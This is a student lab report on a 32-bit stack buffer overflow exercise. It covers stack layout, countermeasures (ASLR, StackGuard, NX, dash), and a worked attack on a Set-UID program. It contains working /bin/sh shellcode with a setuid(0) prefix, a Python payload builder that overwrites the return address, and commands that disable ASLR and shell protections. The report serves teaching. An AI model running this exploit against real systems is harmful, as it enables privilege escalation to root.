Team: Lea Manglicmot, Katerine Lopez<br>
EE G7701 - 2TU<br>
Prof. Tushar Jois<br>
DUE: February 12, 2024

# Assignment 1: Buffer Overflow Attack

### Introduction
A buffer overflow occurs when a program writes more data to a buffer than it can hold, leading to the overflow of excess data into contiguous memory regions. This overflow can be exploited by attackers to overwrite critical program data, inject malicious code, then gain unauthorized access to system resources. <br>

In this assignment, we explore the security countermeasures against buffer overflow attacks along with methods that may overcome those countermeasures. Specifically, given a code with buffer overflow vulnerability, the goal is to gain root privilege as an attacker with and without the countermeasures in place.<br>

### Program stack layout
The stack is used for storing data used in function calls and local variables. A program executes as a series of function calls. Whenever a function is called, space is allocated for it at the top of the stack for the execution of the function. This block of memory is called a stack frame and has four main sections:
- Arguments: parameters passed to the function
- Return address: the memory address to which the function should return after it completes
- Previous frame pointer: a register that keeps track of the top of the stack. It is updated whenever items are pushed onto the stack
- Local variables: variables declared within the function
For the 32-bit x86 architecture, the stack typically grows downward in memory, as indicated in the figure below. This means that the stack pointer decreases as items are pushed onto the stack. So, the "top of the stack" means the end of the stack that has the lower address. When items are removed, the stack pointer is incremented, effectively "freeing" that space.

#### Buffer
The buffer is the space in memory allocated for storing data copied from one place to another. It can be located on the stack or in other memory regions. When data is written to a buffer, it according to the memory layout of the system. Data copying stops when it sees number zero, represented by `\0` in the source string.<br>
When the source string is longer than the allocated buffer size, it will overwrite some portion of the stack above the buffer. Buffers typically grow in the normal direction, from low to high memory addresses, as in the figure below. This means that the "top of the buffer" means the end of the buffer with higher address.<br>
![title](images/program_layout.jpeg)

#### Target program
A target program is especially vulnerable when it takes input from a user. The attacker can have the target program take an input with a large size that, when written to the buffer, will overflow to contiguous memory locations. This is exacly what happens in the target program for this assignment, `stack.c`. <br>

The program has three functions: `main()` which calls `dummy_function()` which calls `bof()`. So, the order of stack frame in the memory follows the order in the figure above. In `main()`, 517 bytes of data is read from a user-generated `badfile` then stored to object`str`. Then, it calls `dummy_function()`, which calls `bof()`. In `bof()`, the contents of `str` is copied to the object `buffer` which has a set size of 100. This is the buffer overflow vulnerability.<br>

### Countermeasures against buffer overflow
Buffer overflow was the most common software vulnerability for a while. With that, several countermeasures at different levels have been developed ot to mitigate buffer overflow. Here are four main countermeasures:
1. Developer-level: `strncpy` vs. `strcpy`
    - `strcpy` blindly copies a string from the source to the destination, making it vulnerable to buffer overflows. In contrast, `strncpy` asks to specify the maximum number of characters to be copied from the destinatin to the source. This reduces the risk of overflow by limiting the copied content. However, it does not prevent buffer overflow from happening.
2. Hardware-level: NX
    - By marking the stack memory region as non-executable, the system prevents malicious code injected into the stack from being executed. The attacker may be successful injecting malicious code into the stack, but they cannot execute it. The control flow of the target program, therefore, is not changed.
3. OS-level: Address Space Layout Randomization (ASLR)
    - Operating systems mitigate memory-related attacks such as buffer overflows and code injection using ASLR. By randomizing the memory addresses, such as of stack frames, ASLR makes it challenging for attackers to predict the locations of specific functions or data in memory, thereby increasing the complexity of exploitation.
4. Compiler-level: StackGuard
     - StackGuard works by inserting a guard value, known as a canary (a random number or special marker), between the buffer and control data (such as the return address) on the stack. When a function is about to return, it checks if the canary value has been altered. If the canary remains intact, it indicates that there has been no buffer overflow. However, if the canary has been modified, the program can respond accordingly, such as by terminating execution or raising an exception.

### Initial Setup
At the outset of the assignment, we implement the following commands. The first command disables ASLR. The second command links `/bin/sh` to the shell `/bin/zsh` which has less countermeasures. These are discussed further in the report. Other countermeasures are disabled at compilation time.
```
$  sudo sysctl -w kernel.randomize_va_space=0
$  sudo ln -sf /bin/zsh /bin/sh
```

The rest of the report is organized as follows. Part 1 introduces the malicious code that will be injected into the target program. The attack is launched in Part 2 given that the hardware-, OS-, and compiler-level countermeasures are disabled. Part 4 relaunches the attack, but with .... In Part 5 the attack is relaunched while the ASLR turned on. In Part 6, the attack is relaunched with the StackGuard protection left enabled. Lastly, the attack is relaunched with NX left enabled.

## Part 1: Shellcode
Shellcode is the malicious code that will be injected in the target program. It spawns a shell with the same privileges as that of the target program. So, if the target program has root privileges, the spawned shell will also have root privileges.<br>

The shellcode is already made available in `call_shellcode.c` inside the `/shellcode` directoty. A `Makefile` is also in the directory which has rules with relevant commands for the assignment. For this part, we use the rule `all` which executes the following command. <br>
```
$  gcc -m32 -z execstack -o a32.out call_shellcode.c
```

The command does the following:
- compiles `call_shellcode_.c` into at 32-bit program via the `-m32` flag
- reverses the default setting of non-executable stack via `-z execstack`
- assigns an output file where the compiled program will be stored via `-o a32.out`; this is an executable file

### Result
When I execute `a32.out`, we get a normal user shell. <br>
![title](images/p1_seed.png)<br>
This is expected because the owner of `a32.out` has normal user privileges. So, the spawned shell due to the shellcode must also have normal user privileges.

## Part 2: Launching attack on a 32-bit program (Level 1)
The program with buffer overflow vulnerability is `stack.c` inside the `/code` directory. There is also a `Makefile` that is constructed, focusing on the `stack_L1` rule, such that:
- the NX stack security countermeasure is disabled
- the StackGuard is disabled via `-fno-stack-protector`
- `stack.c` is compiled into a 32-bit program, then is saved in the executable file `stack-L1`
- `stack.c` is compiled into a 32-bit program with debugging information via the `-g` flag, then is saved as `stack-L1-dbg`
- the L1 buffer is set to have size 100 via`-DBUF-SIZE`
- the owner of `stack-L1` is changed from normal user to root, then to Set-UID

On the last point, the ownership of `stack-L1` must be changed from normal user to Set-UID because we want to emulate the scenario where the vulnerable program is has special privileges, which we want to exploit as an attacker.

### Creating an empty `badfile`
As demonstrated earlier, the target program (`stack.c`) copies data from `badfile`. So, we create an empty file called `badfile` which will be populated later.<br>
```
$  touch badfile
```
### Inside the debugger
We use the `gdb` debugger tool on `stack-L1-dbg` to ultimately obtain where the return address (RA) is in the stack. We want this region because we will modify its content such that the target program jumps to our shellcode. This information cannot easily be printed out. So, we use the frame pointer instead (`$ebp`), which can easily be obtained through `gdb`. The RA region is simply 4 bytes higher than `$ebp`. <br>

The frame pointer, typically denoted as ebp in the x86 architecture, is a special register that points to a fixed location in the stack frame. It facilitates the calculation of the address of each argument and local variable within the frame. In the x86 architecture, the ebp register always points to the region where the previous frame pointer was stored.

We also want to get the distance between the beginning of the buffer (`&buffer`) and the RA region so that we can populate `badfile` such that the new RA just coincides with the RA region. 

To get the relevant values, the program must be at the point where it enters`bof()`, so we set the breakpoint in the debugger. `stack-L1-dbg` breaks at `0x12ad`, line 16 in `stack.c`.<br>
![title](images/stack_L1_dbg_run.png)<br>
We see the similar information towards the end of the output.<br>
![title](images/stack_L1_dbg_b.png)<br><br>

However, at this point, `$ebp` is still pointing to the caller of `bof()`. We use the command `next` once to update `$ebp` such that it points to the bottom of the stack frame for`bof()`. Then, we take the difference between `$ebp` and `&buffer` to get the distance between them. From the snippet below, we see that `$ebp=0xffffcb28`, `&buffer=0xffffcabc`, and the distance between them is 108 in decimal.<br> 
![title](images/stack-L1-dbg-distance.png)<br>

This means that the RA region is `108+4=112` away from the bottom of the buffer.

### Populating `badfile`
To populate `badfile`, we use the skeleton file `exploit.py`; following is an overview of it.
1. instantiate `shellcode`, which is 27 bytes long when inquired
2. instantiate `content` with 517 bytes of NOPs
3. replace the last 27 bytes of `content` with `shellcode`
4. instantiate `ret` with the new RA that would return the program to `shellcode`.
5. instantiate `offset`, which is the distance between the beginning of the buffer (`&buffer`) and the previous frame pointer (`$ebp`)
6. place the new RA in the part of `content` that coincides with the 4-byte region just above `$ebp`
7. write `content` into `badfile`

We had to make changes in `exploit.py` to properly populate `badfile`.

<b>CHANGE 1&ensp;</b>
The object `shellcode` must be replaced with shellcode for the 32-bit program. This can be found in the `/shellcode/call_shellcode.c`, boxed in the snippet below. <br>
![title](images/p2_shellcode.png)<br>

<b>CHANGE 2&ensp;</b>
The object `start` is the estimate of where the shellcode will start. We know that `badfile` has size `517`. We aim to put the `shellcode` towards the end (highest address) of `badfile`. The idea is that the `shellcode` from `start` to `517`. <br>

<b>CHANGE 3&ensp;</b>
The object `ret` refers to the new RA. Since the shellcode will be somewhere above the RA, `ret` must be greater than `$ebp+4` so that the program will return there or somewhere in the NOP-sled above the RA region. <br>

<b>CHANGE 4&ensp;</b>
The object `offset` is the distance between `&buffer` and RA, which we already calculated to be `112`.<br>


We tweaked `exploit.py` as a function to get some values that would help us iteratively make informed decisions for `start` and `ret` values. The following cell defines a function `exploit()` that takes the following arguments:
- the shellcode from `call_shellcode.c`
- `ebp`: may be different between `stack-L1` and `stack-L1-dbg` because of the abscence/addition of debugging information. It defaults to the `$ebp` from the latter
- `ret_add`: the guess offset from the buffer to the shellcode. Theoretically, the first address the program can return to is right above the RA region, so we make the default `ret_add=8`.
- `write`: for whether we want `content` to be written into `badfile`

In [9]:
def exploit(shellcode, ebp = 0xffffcb28, ret_add=8, write=False):
    import sys
    content = bytearray(0x90 for i in range(517)) 
    ##################################################################d
    start = len(content)-len(shellcode)       # CHANGE 2: this number (OG: 0)
    content[start:start + len(shellcode)] = shellcode
    ret    = ebp+ret_add   # CHANGE 3: this number (OG: 0x00)
    offset = 112              # CHANGE 4: this number 
    L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
    content[offset:offset + L] = (ret).to_bytes(L,byteorder='little') 
    ##################################################################
    if write == True:
        # Write the content to a file
        with open('badfile', 'wb') as f:
            f.write(content)
    ##################################################################
    if ret_add == 8:
        print(f'length of shellcode:\t{len(shellcode)}')
        print(f'start of shellcode:\t{start}')
        print(f'offset:\t{offset}\nL:\t{L}')
        print(f'distance between frame pointer and start of shellcode:\t{start-offset}')
    print(f'The new return address is {content[offset:offset+L]}')

### Trial 1: Illegal instruction

In [3]:
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
             "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
             "\xd2\x31\xc0\xb0\x0b\xcd\x80"
            ).encode('latin-1')
exploit(shellcode)

length of shellcode:	27
start of shellcode:	490
offset:	112
L:	4
distance between frame pointer and start of shellcode:	378
The new return address is bytearray(b'0\xcb\xff\xff')


<br>Given the printed values from `exploit()`, we edited `exploit.py` with `start=490` and `ret=0xffffcb28+8`. We were thrown an "Illegal instruction" error. This means that we jumped somewhere in the NOP-sled. This portion is boxed in red in the image below.

### Trial 2: Bingo!
For our second trial, we only changed `ret_add`. Since we know that in `badfile`, `shellcode` starts at byte 490 and the `ebp` region ends at byte 111, there is a difference of 378 bytes between the two. This value was also printed in Trial 1, in "distance between frame pointer and start of shellcode". <br>

In [7]:
exploit(shellcode, ret_add=378)

The new return address is bytearray(b'\xa2\xcc\xff\xff')


<br>Running these values, we get root shell! While our real user id (`uid`)is still of normal user privileges, our effective user id (`euid`) is of root. The `euid` is highlighted below. <br>
![title](images/L1_bingo.png)<br><br>

The final `exploit.py` for Part 2 contains the following changes.<br>
![title](images/p2_changes.png)

## ~~Part 3: Lauching the attack without knowing the buffer size (Level 2)~~

## Part 4: Defeating `dash`'s countermeasure
In Part 1, when we merely ran the command `make`, we got a normal user shell because `call_shellcode.c` simply spawns a shell. While we turned off several security countermeasures, the program itself does not attack. <br>

In Part 2, we launched an attack where the spawned shell is root. We were able to do this because one of the countermeasures we sidestepped was the type of shell can detect the difference between `uid` and `euid` when we made `/bin/sh` point to `/bin/zsh` at the outset.<br><br>


Before we enable the `dash` countermeasure, we first tested again if we could get root shell with the command `make setuid` inside `/shellcode`. The `setuid` rule in the Makefile compiles `call_shellcode.c` into `a32.out` just the same as in Part 1, but it then changes the ownership of `a32.out` to root and then to Set-UID. <br>
![title](images/p4_seed_to_root.png)<br><br>
The boxed line above confirms that we could get a root shell should we choose to execute `a32.out` since we have `root` and `seed` for `euid` and `uid`, respectively.<br><br>

### Enabling `dash`
Now, we enable `dash` by having `/bin/sh` point to `/bin/dash` with the following command:<br>
```
$  sudo ln -sf /bin/dash /bin/sh
```
After running `make setuid` then executing `a32.out`, we do not get a root shell anymore.
![title](images/p4_seed_to_seed.png) <br>

### Countering `dash`
To counter the countermeasure of the `dash` shell, `call_shellcode.c` must be modified such that the `setuid(0)` system call is invoked before executing the `execve()`. <br>
![title](images/p4_shellcode_changes.png)<br>

The same update to `shellcode` can be done in `exploit.py`. Because `shellcode` is now longer than that in Part 2, other values in `exploit.py` also need an update.

### Trial 1: Illegal instruction
Again, we start with the default arguments in the `exploit()` function.

In [8]:
shellcode= (
  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"      # added for setuid(0)
  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
  "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')
exploit(shellcode)

length of shellcode:	35
start of shellcode:	482
offset:	112
L:	4
distance between frame pointer and start of shellcode:	370
The new return address is bytearray(b'0\xcb\xff\xff')


<br>From the printed values, we see that `shellcode` is now 8 bytes longer; if we want `shellcode` to be placed at the tail-end of `badfile`, it must start at byte 482. Using the values in `exploit.py` throws an "Illegal instruction" error.<br>

### Trial 2: Bingo!
Passing the previously printed distance between frame pointer and start of shellcode, `ret_add=370`, we get a root shell!<br>
![title](images/p4_bingo.png)<br><br>
The final `exploit.py` for Part 4 is the following.<br>
![title](images/p4_exploit_changes.png)

## Part 5: Defeating address randomization
At the outset of the assignment, the ASLR was disabled. For this part, it is enabled using the following command. Setting `2` not only randomizes the stack segment, it also randomizes the heap segment. Setting `1` randomizes only the stack segment.<br>
```
$  sudo /sbin/sysctl -w kernel.randomize_va_space=2
```
With the ASLR turned on, guessing the return address for the injected shellcode becomes much more difficult but not impossible, particularly for a 32-bit system. A 32-bit system, such as what is effectively used in this project, has 19 bits of entropy for stack. This means that a stack frame's base address can take any of 2<sup>n</sup> possible locations with equal probability. When we execute `stack-L1` with the most recent `badfile` from Part 4, we are thrown a "Segmentation fault" error. <br>
![title](images/p5_va2.png)<br><br>
Before, we only had to estimate offsets between regions in a stack frame, and the stack frame has a a static location within memory. Now, we have to guess an absolute address, which would be in a different memory location in each attempt. Thus, instead of having a systematic way to estimate locations, we run the provided shell script `brute_force.sh` which executes `stack-L1` on an infinite loop until we get a root shell.

### Trial 1: Bingo!
On our first trial, the shell script looped 264481 times, for <i>4 minutes and 44 seconds</i> before we got a root shell. For the rest of the runs, the error was always "Segmentation fault".<br>
![title](images/p5_bingo.png)

### More trials
We did two more runs to see if the time would be the same: <i>21 secs</i>, and <i>1 mins and 58 secs</i>, respectively. We also ran the shell script at setting `1` to see if it would take longer on average, than when on setting `2`. The first trial took <i>3 mins and 38 secs</i>. Second try took <i>38 secs</i>.<br>

For us, the difference between the trials within individual settings have significant difference, while the difference between the averages of the two settings were marginal. This is not enough to conclude where setting `1` yielded to a slower search than setting `2`.

## Part 6: StackGuard protection

After disabling ASLR again, we left the StackGuard enabled (by default) by removing the `-fno-stack-protector` flag in `code/Makefile`. We recompiled `stack.c`. Even when the ownership of the executable file `stack-L1` was changed to Set-UID and the ASLR disabled, the detected attack was still unsuccessful. The attack was identified as "stack smashing". The program was ultimately aborted. <br>
![title](images/p6_smash.png)

## Part 7: Non-executable stack protection
In Ubuntu, the kernel or dynamic linker marks a field in the program header to determine whether the stack of a running program should be executable or non-executable (NX). By default, the compiler `gcc` automatically makes the stack NX. So, by removing `-z execstack` from `shellcode/Makefile`, we enable NX stack. Alternatively, we can include the `-z noexecstack` flag to explicitly make the stack non-executable. <br>

After recompiling `call_shellcode.c` with just `make` and with `make setuid`, we are thrown a "Segmentation Fault," indicating that we attempted to execute a program from a non-executable area of memory. This outcome illustrates the effectiveness of using a non-executable stack as a security measure to prevent the direct execution of injected shellcode from the stack.<br>

![title](images/p7_nx.png)

## Conclusion
The various methods of countermeasure against buffer overflow that are explored in this assignment have different levels of efficacy. Appropriate memory-copy functions (e.g. `strncpy`) does not prevent buffer overflow nor an attack of the type, but it invites the developer to think about the buffer size.  and NX stack does not prevent buffer overflow. NX-stack also does not prevent buffer overflow, but it prevents any injected malicious code to the stack from running. ASLR also does not prevent buffer overflow, but it does make returning to the memory address of interest (i.e., the malicious code) extremely difficult. StackGuard seem to be the most automatic and proactive, given that it can detect buffer overflow at runtime by placing a region between the return address and frame pointer regions that holds a secret value, whose only copy is outside the stack. <br> Ultimately, it is good to have multiple layers of security, just as the virtual machine we worked on prior to any of the changes we made. 